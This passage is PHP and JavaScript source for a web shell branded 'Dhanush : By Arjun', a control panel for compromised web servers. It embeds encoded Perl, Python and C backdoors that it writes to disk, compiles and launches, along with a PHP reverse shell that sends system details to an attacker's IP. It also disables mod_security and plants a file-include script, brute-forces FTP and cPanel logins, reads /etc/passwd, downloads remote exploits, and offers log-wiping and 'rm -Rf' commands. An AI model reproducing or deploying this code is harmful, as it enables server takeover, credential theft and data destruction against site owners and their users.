5517 if(ajaxRequest.readyState == 4)
5518 {
5519 document.getElementById("showmal").innerHTML=ajaxRequest.responseText;
5520 }
5521 }
5522
5523 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?"+malwork+"&path="+malpath, true);
5524 ajaxRequest.send(null);
5525}
5526function getexploit(wurl,path,functiontype)
5527{
5528 document.getElementById("showexp").innerHTML=waitstate;
5529 var ajaxRequest;
5530 ajaxRequest = new XMLHttpRequest();
5531
5532 ajaxRequest.onreadystatechange = function()
5533 {
5534 if(ajaxRequest.readyState == 4)
5535 {
5536 document.getElementById("showexp").innerHTML=ajaxRequest.responseText;
5537 }
5538 }
5539
5540 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?uploadurl&wurl="+wurl+"&functiontype="+functiontype+"&path="+path, true);
5541 ajaxRequest.send(null);
5542}
5543function showMsg(msg)
5544{
5545 if(msg == 'smf')
5546 {
5547 document.getElementById('tableprefix').value="smf_";
5548 document.getElementById('fid').style.display='block';
5549 document.getElementById('wpress').style.display='none';
5550 document.getElementById('joomla').style.display='none';
5551 }
5552 if(msg == 'mybb')
5553 {
5554 document.getElementById('tableprefix').value="mybb_";
5555 document.getElementById('wpress').style.display='none';
5556 document.getElementById('joomla').style.display='none';
5557 document.getElementById('fid').style.display='block';
5558 }
5559 if(msg == 'ipb' || msg == 'vb')
5560 {
5561 document.getElementById('tableprefix').value="";
5562 document.getElementById('wpress').style.display='none';
5563 document.getElementById('joomla').style.display='none';
5564 document.getElementById('fid').style.display='block';
5565 }
5566 if(msg == 'wp')
5567 {
5568 document.getElementById('tableprefix').value="wp_";
5569 document.getElementById('wpress').style.display='block';
5570 document.getElementById('fid').style.display='none';
5571 document.getElementById('joomla').style.display='none';
5572 }
5573 if(msg == 'joomla')
5574 {
5575 document.getElementById('joomla').style.display='block';
5576 document.getElementById('tableprefix').value="jos_";
5577 document.getElementById('wpress').style.display='none';
5578 document.getElementById('fid').style.display='none';
5579
5580
5581 }
5582}
5583function checkforum(msg)
5584{
5585 if(msg == 'smf')
5586 {
5587 document.getElementById('tableprefix').value="smf_";
5588 document.getElementById('smfipb').style.display='block';
5589 document.getElementById('myjoomla').style.display='none';
5590 document.getElementById('wordpres').style.display='none';
5591 }
5592 if(msg == 'phpbb')
5593 {
5594 document.getElementById('tableprefix').value="phpb_";
5595 document.getElementById('myjoomla').style.display='none';
5596 document.getElementById('smfipb').style.display='block';
5597 document.getElementById('wordpres').style.display='none';
5598 }
5599 if(msg == 'mybb')
5600 {
5601 document.getElementById('tableprefix').value="mybb_";
5602 document.getElementById('myjoomla').style.display='none';
5603 document.getElementById('smfipb').style.display='none';
5604 }
5605 if(msg == 'vb')
5606 {
5607 document.getElementById('tableprefix').value="";
5608 document.getElementById('myjoomla').style.display='none';
5609 document.getElementById('smfipb').style.display='none';
5610 }
5611 if(msg == 'ipb')
5612 {
5613 document.getElementById('myjoomla').style.display='none';
5614 document.getElementById('smfipb').style.display='block';
5615 document.getElementById('tableprefix').value="";
5616 document.getElementById('wordpres').style.display='none';
5617
5618 }
5619 if(msg == 'wp')
5620 {
5621 document.getElementById('tableprefix').value="wp_";
5622 document.getElementById('myjoomla').style.display='none';
5623 document.getElementById('smfipb').style.display='block';
5624 document.getElementById('wordpres').style.display='block';
5625 }
5626 if(msg == 'joomla')
5627 {
5628 document.getElementById('myjoomla').style.display='block';
5629 document.getElementById('tableprefix').value="jos_";
5630 document.getElementById('smfipb').style.display='none';
5631
5632 }
5633}
5634</script>
5635<body>
5636<?php
5637
5638$back_connect_p="eNqlU01PwzAMvVfqfwjlkkpd94HEAZTDGENCCJC2cRrT1DUZCWvjqk5A/fcs3Rgg1gk0XxLnPT/bsnN60rZYthdKt4vKSNC+53sqL6A0BCuMCEK6EiYi4O52UZSQCkTHkoCGMMeKk/Llbdqd+V4dx4jShu7ee7PQ0TdCMQrDxTKxmTEqF2ANPe/U+LtUmSDdC98ja0NYOe1tTH3Qrde/md8+DCfR1h0/Du7m48lo2L8Pd7FxClqL1FDqqoxcWeE3FIXmNGBH2LMOfum1mu1aJtqibCY4vcs/Cg6AC06uKtIvX63+j+CxHe+pkLFxhUbkSi+BsU3eDQsw5rboUcdermergYZR5xDYPQT2DoFnn8OQIsvc4uw2NU6TLKPTwOokF0EUtJJgFu5r4wlFSRT/2UOznuJfOo2k+l+hdGnVmv4Bmanx6Q==";
5639
5640$backconnect_perl="eNqlUl9rwjAQfxf8Drcqa4UWt1dLZU7rJmN2tNWXTUps45qtJiVNGf32S9pOcSAI3kNI7vcnd9z1boZlwYdbQoc55llZYFh4o1HA4m8s7G6n2+kXVSHwHmQ4oNfMLSpSXYL9if80dR7kuZYvpW110LzmJMPPiCYZVplup6hRI/CmL25owts8WizVRSWiIPTdyasJn1jknAm2rSjaY0MXca4PBtI/ZpTi+ChXbihJeESooSpZv99vTCAUiwgJ9pe72wykuv6+EVpjVAq2k62mRg2wHFMjCGeLpQna+LZhaSeQtwrNM5Dr+/+hnBMqQHOuiA+q2Qcj63zMUkRlI+cJlxhNWYITeKxgwr9KeonRda01Vs1aGRqOUwaW5ThBnSB0xxzHsmwo1fzBQjYoin3grQrMjyyS2KfwjHC5JYxXDZ7/tAQ4fpTiLFMoqHm1dbRrrhat53rzX0SL2FA=";
5641
5642$bind_port_c="bZJRT9swEIDfK/U/eEVa7WJK0mkPrMukaoCEpnUT8DKVKjK2Q05LbMt2KGzw3+ekKQ0Zfkn83efL3TkHoHhRCYk+Oy9AT/Mvw8FBh1lQdz1YKQhuDyrpxe1/p0UBWwjKo5KBwvULs3ecIp4ziyaTsLkn6O9wgMKqo45yCvPtvnHM6kO0bkEoqOLB0fw3E8KmoJBtQ4LJUisc04jsZJQ0pvR4cZ5eLM+u6dWPr9/Sq+vLs8X3vQcZfucIstJXVqGjuMV26kClGSuheAyZ2hSvgkZbH0K518ph5jXgup1VvCbklVfXOnXNo9ULfLFcnJ5epovlr517C0pgRxHudYkm5L2lKHqIX0ouwhVIVcsfd2iTQyFx/DLLZn4J41waH8Ro328zrcrMMH+TxW+wWZdtLHgZ4Ognc26jrfg0oiddwUomQtxQB3+kzrAh3WimLYYkmkP9exWhC0PmcHhI9kZ7KQibFaxRkqDxjRoT9PTUJTaQ3pl6bYUQj8adb0LWTJWXZntDszU1pM4T9VK4xzDYEo+Ow2UcuxwdwahbOy+0C63v0PNw8PwP";
5643
5644$bind_port_p="bZFvS8NADMZft9DvkNUxW6hsw5f+wbJVHc5WelUQldK1mTucd6W94cTtu3tpN1DxXS753ZMnyUGnv6qr/oyLfonV0jK77DqYTs/sJlUv4IjbJ5bJ5+Bc+PHVA5zC0IUvwDVXztA9ga1lrmoEJvM3VJqsm8BhXu/uMp2EQeL1WDS6SVkSB/6t94qqrKSSs0+RvaNzqPLy0HVhs4GCI9ijTCjIK8wUQqv0LKh/jYqesiRlFk1T0tTaLErj4J4F/ngce9qOZWrbhWaIzoqiSrlwumT8afDiTULiUj98/NtSliiglNWu3ZLXCoWWOf7DtYUf5MeCL9GhlVimkeU5aoejKAw9RmYMPnc6TrfkxdlcVm9uixl7PSEVUN4G2m+nwDkXWADxzW+jscWS8ST07NMe6dq/8tF94tnn/xSCOP5dwDXm0N52P1FZcT0RIbvhiFnpxbdYO59h5Eup70vYTogrGFCoL7/9Bg==";
5645shellstyle();
5646?>
5647<div align="center">
5648<a href="<?php $_SERVER['PHP_SELF'];?>"><font size="6" color="#FF0000" style="text-decoration:none;" face="Times New Roman, Times, serif">Dhanush : By Arjun </font></a>
5649
5650</div>
5651<hr color="#1B1B1B">
5652
5653<table cellpadding="0" style="width:100%;">
5654 <tr>
5655 <td colspan="2" style="width:75%;">System Info : <font class="txt"><?php systeminfo(); ?></font></td>
5656 <td style="width:10%;">Server Port : <font class="txt"><?php serverport(); ?></font></td>
5657 <td style="width:15%;"><a href=# onClick="maindata('com')"><font class="txt"><i>Software Info</i></font></a></td>
5658 </tr>
5659 <?php if($os != 'Windows' || shell_exec("id") != null) { ?><tr>
5660 <td style="width:75%;" colspan="2">Uid : <font class="txt"><?php echo shell_exec("id"); ?></font></td>
5661 <?php $d0mains = @file("/etc/named.conf");
5662 $users=@file('/etc/passwd');
5663 if($d0mains)
5664 {
5665 $count;
5666 foreach($d0mains as $d0main)
5667 {
5668 if(@ereg("zone",$d0main))
5669 {
5670 preg_match_all('#zone "(.*)"#', $d0main, $domains);
5671 flush();
5672 if(strlen(trim($domains[1][0])) > 2)
5673 {
5674 flush();
5675 $count++;
5676 }
5677 }
5678 }
5679 ?><td colspan=2 style="width:75%;">Websites : <font class="txt"><?php echo "$count Domains"; ?></font></td><?php
5680 }
5681 else if($users)
5682 {
5683 $file = fopen("/etc/passwd", "r");
5684 while(!feof($file))
5685 {
5686 $s = fgets($file);
5687 $matches = array();
5688 $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
5689 $matches = str_replace("home/","",$matches[1]);
5690 if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
5691 continue;
5692 $count++;
5693 }
5694 ?><td colspan=2 style="width:75%;">Websites : <font class="txt"><?php echo "$count Domains"; ?></font></td><?php } ?>
5695 </tr><?php } ?>
5696 <tr>
5697 <td style="width:20%;">Disk Space : <font class="txt"><?php echo HumanReadableFilesize(diskSpace()); ?></font></td>
5698 <td style="width:20%;">Free Space : <font class="txt"><?php echo HumanReadableFilesize(freeSpace()); $dksp = diskSpace(); $frsp = freeSpace(); echo " (".(int)($frsp/$dksp*100)."%)"; ?></font></td>
5699
5700 <td style="width:20%;">Server IP : <font class="txt"><a href="http://whois.domaintools.com/<?php serverip(); ?>"><?php serverip(); ?></a></font></td>
5701 <td style="width:15%;">Your IP : <font class="txt"><a href="http://whois.domaintools.com/<?php yourip(); ?>"><?php yourip(); ?></a></font></td>
5702 </tr>
5703
5704 <tr>
5705 <?php if($os == 'Windows'){ ?><td style="width:15%;">View Directories : <font class="txt"><?php echo showDrives();?></font></td><?php } ?>
5706 <td style="width:30%;">Current Directory : <span id="crdir"><font color="#009900">
5707 <?php
5708 $d = str_replace("\\",$directorysperator,$dir);
5709 if (substr($d,-1) != $directorysperator) {$d .= $directorysperator;}
5710 $d = str_replace("\\\\","\\",$d);
5711 $dispd = htmlspecialchars($d);
5712 $pd = $e = explode($directorysperator,substr($d,0,-1));
5713 $i = 0;
5714 foreach($pd as $b)
5715 {
5716 $t = '';
5717 $j = 0;
5718 foreach ($e as $r)
5719 {
5720 $t.= $r.$directorysperator;
5721 if ($j == $i) {break;}
5722 $j++;
5723 }
5724$href=addslashes($t);
5725
5726 echo "<a href=javascript:void(0) onClick=\"changedir('dir','$href')\"><b><font class=\"txt\">".htmlspecialchars($b).$directorysperator.'</font></b></a>';
5727 $i++;
5728 }
5729
5730 ?>
5731 </font></span> <a href=# onClick="gethome('home','<?php echo addslashes(getcwd()); ?>')">[Home]</a></td>
5732 <td style="width:20%;">Disable functions : <font class="txt"><?php echo getDisabledFunctions(); ?> </font></td>
5733 <td>Safe Mode : <font class=txt><?php echo safe(); ?></font></td>
5734 <?php if($os == "Linux") { ?><td><a href="<?php echo $self.'?downloadit'?>"><font color="#FF0000">Download It</font></a><?php } ?></td>
5735 </tr>
5736 </table>
5737
5738<?php $m1 = array('Symlink'=>'symlinkserver','Forum'=>'forum','Sec. Info'=>'secinfo','Code Inject'=>'injector','Bypassers'=>'bypass','Server Fuzzer'=>'fuzz','Zone-h'=>'zone','DoS'=>'dos','Mail'=>'mailbomb','Tools'=>'tools','PHP'=>'phpc','Exploit'=>'exploit','Connect'=>'connect');
5739 $m2 = array('SQL'=>'database','404 Page'=>'404','Malware Attack'=>'malattack','Cpanel Cracker'=>'cpanel','About'=>'about');
5740 echo "<table border=3 style=border-color:#333333; width=100%; cellpadding=2>
5741 <tr>";
5742 $menu = '';
5743
5744 foreach($m1 as $k => $v)
5745 $menu .= "<td style=\"border:none;\"><a href=# onClick=\"maindata('".$v."')\"><font class=\"mainmenu\">[".$k."]</font></a></td>";
5746 echo $menu;
5747 echo "</tr>
5748</table>
5749<div style=\"float:left;\">
5750 <a href=\"javascript:history.back(1)\"><font class=txt size=3> [Back] </font></a>
5751 <a href=\"javascript:history.go(1)\"><font class=txt size=3> [Forward] </font></a>
5752 <a href=\"\"><font class=txt size=3> [Refresh] </font></a></div>
5753<table style=\"margin-left:270px; border-color:#333333;\" border=2 width=60%; cellpadding=2>
5754 <tr align=center>";
5755 foreach($m2 as $k => $v)
5756 $menu1 .= "<td style=\"border:none;\"><a href=# onClick=\"maindata('".$v."','".addslashes($_GET['dir'])."')\"><font class=\"mainmenu\">[".$k."]</font></a></td>";
5757 echo $menu1;
5758 echo "<td style=\"border:none;\"><a href=javascript:void(0) onClick=\"if(confirm('Are You Sure You Want To Kill This Shell ?')){getmydata('selfkill');}else{return false;}\"><font class=mainmenu>[SelfKill]</font></a></td>
5759 <td style=\"border:none;\"><a href=\"$self?logout\"><font class=mainmenu>[LogOut]</font></a></td>
5760 </tr>
5761</table>";?>
5762
5763<div id="showmaindata"></div>
5764<?php
5765
5766if(isset($_GET["downloadit"]))
5767{
5768 $FolderToCompress = getcwd();
5769 execmd("tar --create --recursion --file=backup.tar $FolderToCompress");
5770
5771 $prd=explode("/","backup.tar");
5772 for($i=0;$i<sizeof($prd);$i++)
5773 {
5774 $nfd=$prd[$i];
5775 }
5776 @ob_clean();
5777 header("Content-type: application/octet-stream");
5778 header("Content-length: ".filesize($nfd));
5779 header("Content-disposition: attachment; filename=\"".$nfd."\";");
5780 readfile($nfd);
5781 exit;
5782}
5783//Turn Safe Mode Off
5784
5785 if(getDisabledFunctions() != "None" || safe() != "OFF")
5786 {
5787 $file_pointer = fopen(".htaccess", "w+");
5788 fwrite($file_pointer, "<IfModule mod_security.c>
5789 SecFilterEngine Off
5790 SecFilterScanPOST Off
5791 </IfModule> \n\r");
5792
5793 $file_pointer = fopen("ini.php", "w+");
5794 fwrite($file_pointer, "<?
5795echo ini_get(\"safe_mode\");
5796echo ini_get(\"open_basedir\");
5797include(\$_GET[\"file\"]);
5798ini_restore(\"safe_mode\");
5799ini_restore(\"open_basedir\");
5800echo ini_get(\"safe_mode\");
5801echo ini_get(\"open_basedir\");
5802include(\$_GET[\"ss\"]);
5803?>");
5804
5805 $file_pointer = fopen("php.ini", "w+");
5806 fwrite($file_pointer, "safe_mode = Off");
5807
5808 fclose($file_pointer);
5809
5810 }
5811
5812 else if(isset($_POST['cpanelattack']))
5813 {
5814 if(!empty($_POST['username']) && !empty($_POST['password']))
5815 {
5816 $userlist=explode("\n",$_POST['username']);
5817 $passlist=explode("\n",$_POST['password']);
5818
5819 if($_POST['cracktype'] == "ftp")
5820 {
5821 foreach ($userlist as $user)
5822 {
5823 $pureuser = trim($user);
5824 foreach ($passlist as $password )
5825 {
5826 $purepass = trim($password);
5827 ftp_check($_POST['target'],$pureuser,$purepass,$connect_timeout);
5828 }
5829 }
5830 }
5831 if ($_POST['cracktype'] == "cpanel" || $_POST['cracktype'] == "telnet")
5832 {
5833 if($cracktype == "telnet")
5834 $cpanel_port="23";
5835 else
5836 $cpanel_port="2082";
5837 foreach ($userlist as $user)
5838 {
5839 $pureuser = trim($user);
5840
5841 echo "<b><font face=Tahoma style=\"font-size: 9pt\" color=#008000> [ - ] </font><font face=Tahoma style=\"font-size: 9pt\" color=#FF0800>
5842 Processing user $pureuser ...</font></b><br><br>";
5843
5844 foreach ($passlist as $password )
5845 {
5846 $purepass = trim($password);
5847 cpanel_check($_POST['target'],$pureuser,$purepass,$connect_timeout);
5848
5849 }
5850 }
5851 }
5852 }
5853 else
5854 $bdmessage = "<center>Enter Username & Password List<center>";
5855 }
5856
5857else if(isset($_GET['info']))
5858{
5859 $bdmessage = "<br><div align=left><font class=txt>".nl2br(shell_exec("whois ".$_GET['info']))."</font></div>";
5860}
5861else if(isset($_POST['u']))
5862{
5863 $path = $_REQUEST['path'];
5864 if(is_dir($path))
5865 {
5866 $setuploadvalue = 0;
5867 $uploadedFilePath = $_FILES['uploadfile']['name'];
5868 $tempName = $_FILES['uploadfile']['tmp_name'];
5869 if($os == "Windows")
5870 $uploadPath = $path . $directorysperator . $uploadedFilePath;
5871 else if($os == "Linux")
5872 $uploadPath = $path . $directorysperator . $uploadedFilePath;
5873 if($stat = move_uploaded_file($_FILES['uploadfile']['tmp_name'] , $uploadPath))
5874 $bdmessage = "<font class=txt size=3><blink>File uploaded to $uploadPath</blink></font>";
5875 else
5876 $bdmessage = "<font size=3><blink>Failed to upload file to $uploadPath</blink></font>";
5877 }
5878 ?><script type="text/javascript">changedir('dir','<?php echo addslashes($path); ?>'); </script><?php
5879}
5880else if(isset($_POST['backdoor']))
5881{
5882 if(isset($_POST['passwd']) && isset($_POST['port']) && isset($_POST['lang']))
5883 { ?><script type="text/javascript">gethome('connect');</script><?php
5884 $passwd = $_POST['passwd'];
5885
5886 if($_POST['lang'] == 'c')
5887 {
5888 if(is_writable("."))
5889 {
5890 @$fh=fopen(getcwd()."/backp.c",'w');
5891 @fwrite($fh,gzinflate(base64_decode($bind_port_c)));
5892 @fclose($fh);
5893 execmd("chmod 0755 ".getcwd()."/backp.c");
5894 execmd("gcc -o ".getcwd()."/backp ".getcwd()."/backp.c");
5895 execmd("chmod 0755 ".getcwd()."/backp");
5896 execmd(getcwd()."/backp"." ".$_POST['port']." ". $passwd ." &");
5897 $scan = exec_all("ps aux | grep backp".$_POST['port']);
5898 if(eregi("backp".$_POST['port'],$scan))
5899 $bdmessage = "Process found running, backdoor setup successfully.";
5900 else
5901 $bdmessage = "Process not found running, backdoor not setup successfully.";
5902 }
5903 else
5904 {
5905 @$fh=fopen("/tmp/backp.c","w");
5906 @fwrite($fh,gzinflate(base64_decode($bind_port_c)));
5907 @fclose($fh);
5908 execmd("chmod 0755 /tmp/backp.c");
5909 execmd("gcc -o /tmp/backp /tmp/backp.c");
5910 $out = execmd("/tmp/backp"." ".$_POST['port']." ". $passwd ." &");
5911 $scan = exec_all("ps aux | grep backp".$_POST['port']);
5912 if(eregi("backp".$_POST['port'],$scan))
5913 $bdmessage = "Process found running, backdoor setup successfully.";
5914 else
5915 $bdmessage = "Process not found running, backdoor not setup successfully.";
5916 }
5917 }
5918 if($_POST['lang'] == 'perl')
5919 {
5920 if(is_writable("."))
5921 {
5922 @$fh=fopen(getcwd()."/bp.pl",'w');
5923 @fwrite($fh,gzinflate(base64_decode($bind_port_p)));
5924 @fclose($fh);
5925 execmd("chmod 0755 ".getcwd()."/bp.pl");
5926 execmd("perl ".getcwd()."/bp.pl ".$_POST['port']." ". $passwd ." &");
5927
5928 $bdmessage = "<pre>$out\n".execmd("ps aux | grep bp.pl")."</pre>";
5929 }
5930 else
5931 {
5932 @$fh=fopen("/tmp/bp.pl","w");
5933 @fwrite($fh,gzinflate(base64_decode($bind_port_p)));
5934 @fclose($fh);
5935 execmd("chmod 0755 ".getcwd()."/bp.pl");
5936 execmd("perl ".getcwd()."/bp.pl ".$_POST['port']." ". $passwd ." &");
5937 $bdmessage = "<pre>$out\n".execmd("ps aux | grep bp.pl")."</pre>";
5938 }
5939 }
5940 }
5941}
5942else if(isset($_POST['backconnect']))
5943{
5944 if($_POST['ip'] != "" && $_POST['port'] != "")
5945 { ?><script type="text/javascript">gethome('connect');</script><?php
5946 $host = $_POST['ip'];
5947 $port = $_POST['port'];
5948 if($_POST["lang"] == "perl")
5949 {
5950 if(is_writable("."))
5951 {
5952 @$fh=fopen(getcwd()."/bc.pl",'w');
5953 @fwrite($fh,gzuncompress(base64_decode($backconnect_perl)));
5954 @fclose($fh);
5955 $bdmessage = "<font color='#FFFFFF'>Trying to connect...</font>";
5956 execmd("perl ".getcwd()."/bc.pl $host $port &",$disable);
5957 if(!@unlink(getcwd()."/bc.pl")) echo "<font color='#FFFFFF' size=3>Warning: Failed to delete reverse-connection program</font></br>";
5958 }
5959 else
5960 {
5961 @$fh=fopen("/tmp/bc.pl","w");
5962 @fwrite($fh,gzuncompress(base64_decode($backconnect_perl)));
5963 @fclose($fh);
5964 $bdmessage = "<font color='#FFFFFF'>Trying to connect...</font>";
5965 execmd("perl /tmp/bc.pl $host $port &",$disable);
5966 if(!@unlink("/tmp/bc.pl"))
5967 echo "<h2>Warning: Failed to delete reverse-connection program</h2></br>";
5968 }
5969 }
5970 else if($_POST["lang"] == "python")
5971 {
5972 if(is_writable("."))
5973 {
5974 $w_file=@fopen(getcwd()."/bc.py","w") or die(mysql_error());
5975 if($w_file)
5976 {
5977 @fputs($w_file,gzuncompress(base64_decode($back_connect_p)));
5978 @fclose($w_file);
5979 chmod(getcwd().'/bc.py', 0777);
5980 }
5981 execmd("python ".getcwd()."/bc.py $host $port &",$disable);
5982 $bdmessage = "<font color='#FFFFFF'>Trying to connect...</font>";
5983
5984 if(!@unlink(getcwd()."/bc.py"))
5985 echo "<h2>Warning: Failed to delete reverse-connection program</h2></br>";
5986 }
5987 else
5988 {
5989 $w_file=@fopen("/tmp/bc.py","w");
5990 if($w_file)
5991 {
5992 @fputs($w_file,gzuncompress(base64_decode($back_connect_p)));
5993 @fclose($w_file);
5994 chmod('/tmp/bc.py', 0777);
5995 }
5996 execmd("python /tmp/bc.py $host $port &",$disable);
5997 $bdmessage = "<font color='#FFFFFF'>Trying to connect...</font>";
5998 if(!@unlink("/tmp/bc.py"))
5999 echo "<h2>Warning: Failed to delete reverse-connection program</h2><br>";
6000 }
6001 }
6002 else if($_POST["lang"] == "php")
6003 {
6004 $bdmessage = "<font color='#FFFFFF'>Trying to connect...</font>";
6005 $ip = $_POST['ip'];
6006 $port=$_POST['port'];
6007 $sockfd=fsockopen($ip , $port , $errno, $errstr );
6008 if($errno != 0)
6009 {
6010 $bdmessage = "<font color='red'><b>$errno</b> : $errstr</font>";
6011 }
6012 else if (!$sockfd)
6013 {
6014 $result = "<p>Fatal : An unexpected error was occured when trying to connect!</p>";
6015 }
6016 else
6017 {
6018 fputs ($sockfd ,"\n=================================================================\nCoded By Arjun\n=================================================================");
6019 $pwd = exec_all("pwd");
6020 $sysinfo = exec_all("uname -a");
6021 $id = exec_all("id");
6022 $len = 1337;
6023 fputs($sockfd ,$sysinfo . "\n" );
6024 fputs($sockfd ,$pwd . "\n" );
6025 fputs($sockfd ,$id ."\n\n" );
6026 fputs($sockfd ,$dateAndTime."\n\n" );
6027 while(!feof($sockfd))
6028 {
6029 $cmdPrompt ="(dhanush)[$]> ";
6030 fputs ($sockfd , $cmdPrompt );
6031 $command= fgets($sockfd, $len);
6032 fputs($sockfd , "\n" . exec_all($command) . "\n\n");
6033 }
6034 fclose($sockfd);
6035 }
6036 }
6037 }
6038}
6039else if (isset ($_GET['val1'], $_GET['val2']) && is_numeric($_GET['val1']) && is_numeric($_GET['val2']))
6040{
6041 $temp = "";
6042 for(;$_GET['val1'] <= $_GET['val2'];$_GET['val1']++)
6043 {
6044 $uid = @posix_getpwuid($_GET['val1']);
6045 if ($uid)
6046 $temp .= join(':',$uid)."\n";
6047 }
6048 echo '<br/>';
6049 paramexe('Users', $temp);
6050}
6051else if(isset($_GET['download']))
6052{
6053 download();
6054}
6055else
6056{
6057 ?><script type="text/javascript">gethome('home','<?php echo addslashes($dir); ?>');</script><?php
6058}
6059$is_writable = is_writable($dir)?"<font class=txt>< writable ></font>":"< not writable >";
6060?>
6061</p><center><div id="showdir"><?php echo $bdmessage; ?></div></center>
6062<table style="width:100%;border-color:#333333;" border="1">
6063<tr>
6064<td align="center">
6065<form method="post" enctype="multipart/form-data">
6066Upload file : <br><input type="file" name="uploadfile" class="box" size="50">
6067<input type="hidden" id=path name="path" value="<?php echo $dir; ?>" />
6068<input type=submit value="Upload" name="u" value="u" class="but" ></form>
6069<span name="wrtble"><?php
6070echo $is_writable; ?></span>
6071 <br>
6072</td>
6073<td align="center" style="height:105px;">Create File :
6074<form onSubmit="createdir('Create',createfile.value);return false;">
6075<input type="text" class="box" value="<?php echo $dir . $directorysperator; ?>" name="createfile" id="createfile">
6076<input type="button" onClick="createdir('Create',createfile.value)" value="Create" class="but">
6077</form><span name="wrtble">
6078<?php echo $is_writable; ?></span>
6079</td>
6080</tr>
6081<tr>
6082<td align="center" style="height:105px;">Execute : <form onSubmit="executemyfile('execute','<?php echo addslashes($dir); ?>',execute.value);return false;">
6083<input type="text" class="box" name="execute">
6084<input type="hidden" id="exepath" name="exepath" value="<?php echo $dir; ?>">
6085 <input type="button" onClick="executemyfile('execute',exepath.value,execute.value)" value="Execute" class="but"></form></td>
6086
6087<td align="center">Create Directory : <form onSubmit="createdir('createfolder',createfolder.value);return false;">
6088<input type="text" value="<?php echo $dir . $directorysperator; ?>" class="box" name="createfolder" id="createfolder">
6089<input type="button" onClick="createdir('createfolder',createfolder.value)" value="Create" class="but">
6090</form><span name="wrtble"><?php
6091echo $is_writable;
6092?></span></td></tr>
6093<tr><td style="height:105px;" align="center">Get Exploit <form onSubmit="getexploit(wurl.value,path.value,functiontype.value);return false;">
6094<input type="text" name="wurl" class="box" value="http://www.some-code/exploits.c">
6095<input type="button" onClick="getexploit(wurl.value,uppath.value,functiontype.value)" value=" G0 " class="but"><br><br>
6096<input type="hidden" id="uppath" name="uppath" value="<?php echo $dir . $directorysperator; ?>">
6097<select name="functiontype" class="sbox">
6098<option value="wwget">wget</option>
6099<option value="wlynx">lynx</option>
6100<option value="wfread">fread</option>
6101<option value="wfetch">fetch</option>
6102<option value="wlinks">links</option>
6103<option value="wget">GET</option>
6104<option value="wcurl">curl</option>
6105</select>
6106</form><div id="showexp"></div>
6107</td>
6108<td align="center">
6109<form>
6110Some Commands<br>
6111<?php if($os != "Windows")
6112{ ?>
6113<SELECT NAME="mycmd" class="box">
6114 <OPTION VALUE="uname -a">Kernel version
6115 <OPTION VALUE="w">Logged in users
6116 <OPTION VALUE="lastlog">Last to connect
6117 <option value='cat /etc/hosts'>IP Addresses
6118 <option value='cat /proc/sys/vm/mmap_min_addr'>Check MMAP
6119 <OPTION VALUE="logeraser">Log Eraser
6120 <OPTION VALUE="find / -perm -2 -ls">Find all writable directories
6121 <OPTION VALUE="find . -perm -2 -ls">Find all writable directories in Current Folder
6122 <OPTION VALUE="find / -type f -name \"config*\"">find config* files
6123 <OPTION VALUE="find . -type f -name \"config*\"">find config* files in current dir
6124 <OPTION VALUE="find . -type f -perm -04000 -ls">find suid files in current dir
6125 <OPTION VALUE="find / -type f -perm -04000 -ls">find all suid files
6126 <OPTION VALUE="find / -user root -perm -022">find all sgid files
6127 <OPTION VALUE="find . -type f -perm -02000 -ls">find suid files in current dir
6128 <OPTION VALUE="find /bin /usr/bin /usr/local/bin /sbin /usr/sbin /usr/local/sbin -perm -4000 2> /dev/null">Suid bins
6129 <OPTION VALUE="cut -d: -f1,2,3 /etc/passwd | grep ::">USER WITHOUT PASSWORD!
6130 <OPTION VALUE="find /etc/ -type f -perm -o+w 2> /dev/null">Write in /etc/?
6131 <?php if(is_dir('/etc/valiases')){ ?><option value="ls -l /etc/valiases">List of Cpanel`s domains(valiases)</option><?php } ?>
6132 <?php if(is_dir('/etc/vdomainaliases')) { ?><option value=\"ls -l /etc/vdomainaliases">List Cpanel`s domains(vdomainaliases)</option><?php } ?>
6133 <OPTION VALUE="which wget curl w3m lynx">Downloaders?
6134 <OPTION VALUE="cat /proc/version /proc/cpuinfo">CPUINFO
6135 <OPTION VALUE="ps aux">Show running proccess
6136 <OPTION VALUE="uptime">Uptime check
6137 <OPTION VALUE="cat /proc/meminfo">Memory check
6138 <OPTION VALUE="netstat -an | grep -i listen">Open ports
6139 <OPTION VALUE="rm -Rf">Format box (DANGEROUS)
6140 <OPTION VALUE="wget www.ussrback.com/UNIX/penetration/log-wipers/zap2.c">WIPELOGS PT1 (If wget installed)
6141 <OPTION VALUE="gcc zap2.c -o zap2">WIPELOGS PT2
6142 <OPTION VALUE="./zap2">WIPELOGS PT3
6143 <OPTION VALUE="cat /var/cpanel/accounting.log">Get cpanel logs
6144 </SELECT>
6145 <?php } else {?>
6146 <SELECT NAME="mycmd" class="box">
6147 <OPTION VALUE="dir /s /w /b *config*.php">Find *config*.php in current directory
6148 <OPTION VALUE="dir /s /w /b index.php">Find index.php in current dir
6149 <OPTION VALUE="systeminfo">System Informations
6150 <OPTION VALUE="net user">User accounts
6151 <OPTION VALUE="netstat -an">Open ports
6152 <OPTION VALUE="getmac">Get Mac Address
6153 <OPTION VALUE="net start">Show running services
6154 <OPTION VALUE="net view">Show computers
6155 <OPTION VALUE="arp -a">ARP Table
6156 <OPTION VALUE="tasklist">Show Process
6157 <OPTION VALUE="ipconfig/all">IP Configuration
6158
6159 </SELECT>
6160 <?php } ?>
6161 <input type="hidden" id="auexepath" name="auexepath" value="<?php echo $dir; ?>">
6162<input type="button" onClick="executemyfile('mycmd',auexepath.value,mycmd.value)" value="Execute" class="but">
6163</form>
6164</td>
6165</tr></table><br>
6166
6167</td>
6168</tr>
6169</table>
6170
6171<?php
6172
6173
6174//logout
6175
6176if(isset($_GET['logout']))
6177{
6178 setcookie("hacked",time() - 60*60);
6179 header("Location:$self");
6180 ob_end_flush();
6181}
6182?>
6183
6184
